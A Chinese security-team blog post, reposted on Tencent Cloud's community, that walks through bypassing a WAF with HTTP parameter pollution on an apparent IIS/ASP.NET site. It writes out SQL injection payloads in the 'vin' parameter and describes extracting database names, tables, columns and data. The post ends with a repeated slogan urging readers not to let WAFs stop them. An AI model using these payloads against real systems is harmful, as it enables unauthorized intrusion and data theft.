前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >实操:一次简单的HPP绕WAF

实操:一次简单的HPP绕WAF

作者头像
Khan安全团队
发布2021-07-08 11:41:01
5460
发布2021-07-08 11:41:01
举报
文章被收录于专栏:Khan安全团队

一次简单的HPP绕WAF

利用代码中的一段错误,导致我们可以利用hpp来完全绕过防御规则。 WAF绕过中,对规则与正则的绕过总是有局限性的。

直接操作

单引号报错:

闭合一波:

直接被干掉……

仔细看了下第一包的响应:asp.net,基本锁定IIS+ASP.NET,此时hpp不香吗

结合报错回显,直接构造payload:

vin=11111111111111')&vin=and+1=db_name()--+-

参数连接时用了逗号,将payload简单修改下:

vin=11111111111111&vin=')+and+1=db_name()--+-

也可以直接用注释符包含:

依次注出其它库:

注表,通过not in语句:

利用having 1=1和group by注字段:

注数据:

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

学好技术,别再让WAF拦住你脚步。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-06-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档